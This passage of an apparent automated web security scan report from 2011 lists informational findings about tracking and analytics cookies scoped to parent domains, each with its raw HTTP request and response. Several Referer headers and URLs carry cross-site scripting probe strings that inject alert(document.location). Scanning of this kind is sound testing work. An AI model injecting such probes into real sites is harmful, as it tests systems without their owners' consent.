Referer: http://ad.yieldmanager.com/iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:39 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=1_1315831719_1315831704896:4216901696863812; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kwd=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: scg=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ppd=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: act=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 12 Sep 2011 12:48:39 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2


10.30. http://load.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /load/?p=104&g=250&j=0 HTTP/1.1
Host: load.exelator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: xltl=eJxdjrEKAjEQBf8lfSC72d1kYyUqeI2FYi3J7QWsxUr8d%252BOBjd0r5jFTC5XXo8TirtPebcbC4gJwNiHJ2IO0njVhCzhrTqxMpis3Htvj72G9AoBEpQxL1LkrsSYRqxZ4wfblAIp73u12wUDnwyoDLg44BiUAlKSA4Z%252BcTrtVIsW1OCLY2At39BR69lVR%252FdwEWzab6zLS3h8RnDXh; BFF=eJydkL0SwiAQhN%252BFJ%252BAgCQEafxqZUSzCODGNk9LaUvPugkG8ZMQZ0963t3e7vQJQ95sCqogDWtiVlJIRfVVQiVp7wBU5HK3b7c%252BXk2mMI7r37OdOGefYBmv5F9BlTLqcdmLixQ2jhbHbB4VAy5HWNK59KAYsgfmOSGRmFO636NcXiL%252B2OS3HAEaw3mCXkKJ6AzSbqnkiw5JKl%252FaXrynbyF%252FxBRWZqIEMT9BzoOo%253D; TFF=eJydkj0OgzAMRu%252FCCWxDcDALx%252BiagaFSt3ZD3L1p8yMaEsl0QEmk98j3yXFCKNtTkKRDGBZCWKZpom52QrLdBWf%252FjWz9Amm7n3j88H3B0xyOR4%252BzpjP8CsMPycCRNOd%252Fr7f14V5r1zC41cJcbG3%252Ba22UrcNN5BXoSZ3swJsLyaKmnQcV8xgtRJJamQzWOnw9SNszX3bI92Dhcda0Rpoj1OdeTXbg1fdw1q4mI1tLFl5y5G2Fx9bLp8LjrOmM%252FQ1RoAzW; EVX=eJw9ybENgDAMBMBdMoHfYGK%252Fh7FSpqZE2R2lgO6kGwSfyYiwHNRtyZtwNlzdq5fKWXJoWaHlJP51%252BdZQsnetFzSwFF4%253D

Response

HTTP/1.1 302 Found
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: TFF=eJyVkz0OgzAMRu%252FCCWwDcTALx%252BjKwFCpW7sh7t7wkwAmrcyAEtB7sa0v9EIo41uQpECoOkLomqahou2FZHwKtuFx7MMCcTtdeJz5UvHUrq9Hj5NmM8IK1YlkdBtJkZw%252FrWcPj%252BHVf4bCaKQp6tzUq%252FeHR2sdTtqdzigoUJI5jwNf38hj06x5kMrDedAz6J5qzM2weBC3V17PkOqg8jhpViPmCNnc850deHMdTtrdzshnbyTwzvsMr2%252Fkwp%252Bz8af%252F0Osb%252BcOYvpgADJg%253D; expires=Tue, 10-Jan-2012 13:06:07 GMT; path=/; domain=.exelator.com
Location: http://dts1.raasnet.com/dts/exelate/in?segments=&t=i
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Server: HTTP server

10.31. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s72097517517395  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mdwsavannah.112.2o7.net
Path:   /b/ss/mdwsavannah/1/H.20.3/s72097517517395

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/mdwsavannah/1/H.20.3/s72097517517395?AQB=1&ndh=1&t=12/8/2011%2012%3A48%3A50%201%20300&ce=ISO-8859-1&pageName=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&g=http%3A//savannahnow.com/&r=http%3A//drupal.org/cases&cc=USD&ch=Savannah%20Morning%20News&server=Savannah%20Morning%20News%20-%20savannahnow.com&pageType=savannahnow.com/&c1=Frontpage&c2=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&c15=SE&c16=Metro&c17=Home&c18=97010%20Home&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: mdwsavannah.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733218685011339-40000104A014EEDE|4E66430C[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733218685011339-40000104A014EEE0|4E66430C[CE]; s_vi_atamox7Ecaihem=[CS]v4|273678D105013232-60000102803384B7|4E6CF1A1[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:20 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; Expires=Sat, 10 Sep 2016 12:49:20 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 12:49:20 GMT
Last-Modified: Tue, 13 Sep 2011 12:49:20 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6DFFD0-5DB6-4F3F9D04"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www374
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
10.32. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s83483789157502  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mdwsavannah.112.2o7.net
Path:   /b/ss/mdwsavannah/1/H.20.3/s83483789157502

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/mdwsavannah/1/H.20.3/s83483789157502?AQB=1&ndh=1&t=12/8/2011%2013%3A8%3A42%201%20300&ce=ISO-8859-1&pageName=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&g=http%3A//savannahnow.com/%3F4324a%2527-alert%28document.location%29-%25272befc103ff4%3D1&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cc=USD&ch=Savannah%20Morning%20News&server=Savannah%20Morning%20News%20-%20savannahnow.com&pageType=savannahnow.com/&c1=Frontpage&c2=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&c15=SE&c16=Metro&c17=Home&c18=97010%20Home&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1106&bh=816&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&AQE=1 HTTP/1.1
Host: mdwsavannah.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/?4324a%27-alert(document.location)-%272befc103ff4=1
Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; s_vi_iex608x3Bgbx7Dnaxx=[CS]v4|27365326051636CC-400001A380004C94|4E6D4EF3[CE]; s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|273701C005159759-60000176201D1B1E|4E6E037C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:08:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; Expires=Sat, 10 Sep 2016 13:08:24 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 13:08:24 GMT
Last-Modified: Tue, 13 Sep 2011 13:08:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6E0448-1517-3C548CC2"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www637
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
10.33. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s86790688387118  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mdwsavannah.112.2o7.net
Path:   /b/ss/mdwsavannah/1/H.20.3/s86790688387118

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/mdwsavannah/1/H.20.3/s86790688387118?AQB=1&ndh=1&t=12/8/2011%2013%3A4%3A21%201%20300&ce=ISO-8859-1&pageName=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&g=http%3A//savannahnow.com/&r=http%3A//savannahnow.com/&cc=USD&ch=Savannah%20Morning%20News&server=Savannah%20Morning%20News%20-%20savannahnow.com&pageType=savannahnow.com/&c1=Frontpage&c2=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&c15=SE&c16=Metro&c17=Home&c18=97010%20Home&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: mdwsavannah.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733218685011339-40000104A014EEDE|4E66430C[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733218685011339-40000104A014EEE0|4E66430C[CE]; s_vi_atamox7Ecaihem=[CS]v4|273678D105013232-60000102803384B7|4E6CF1A1[CE]; s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|2736FFD8051613AB-600001A280003EFD|4E6DFFB0[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:04:04 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; Expires=Sat, 10 Sep 2016 13:04:04 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 13:04:04 GMT
Last-Modified: Tue, 13 Sep 2011 13:04:04 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6E0344-65FF-06BA6CCE"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www427
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
10.34. http://p.raasnet.com/partners/dfp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/dfp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partners/dfp?partner=40046&ord=0.5825194382847674 HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:18:54 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:18:54 GMT;
Content-Type: text/javascript
Content-Length: 21
Date: Mon, 12 Sep 2011 13:05:33 GMT
Connection: close

rasegs='rasegs=seg2';
10.35. http://p.raasnet.com/partners/oxmap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/oxmap

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partners/oxmap?external_user_id=8ceb81a1-f08d-353c-163f-89b1b78ecd62 HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:07 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close

10.36. http://p.raasnet.com/partners/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/pixel

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /partners/pixel?t=gcm&id=CAESEKhDLfTHbxj77UOiLKpphxM&cver=1 HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=155198643408292; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:28 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:28 GMT;
Set-Cookie: lpp=1784c8199cfe69ffd2e65a19; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:08 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close

10.37. http://p.raasnet.com/partners/universal/in  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/universal/in

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:26 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:26 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:06 GMT;
Content-Type: text/html
Content-Length: 207
Date: Mon, 12 Sep 2011 13:06:06 GMT
Connection: close

<img border='0' width='1' height='1' src='http://p.raasnet.com/partners/exelate'/><img border='0' width='1' height='1' src='http://rd.rlcdn.com/rd?site=43881&type=redir&url=http://dts1.raasnet.com/dts
...[SNIP]...
10.38. http://pixel.quantserve.com/api/segments.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /api/segments.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /api/segments.json?a=p-573scDfDoUH6o&callback=qcCallback HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://widget.newsinc.com/_fw/Savannah/toppicks_savannah_top.html
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EIIBIQHYB4HRBprRW9iB4QschAEA

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EH0BGgHYB7vR0b2IHh2EsRA; expires=Sun, 11-Dec-2011 13:07:51 GMT; path=/; domain=.quantserve.com
Set-Cookie: mc=; expires=Thu, 01-Jan-1970 00:00:10 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: application/x-javascript
Cache-Control: private, no-transform, must-revalidate, max-age=600
Expires: Mon, 12 Sep 2011 13:17:51 GMT
Content-Length: 39
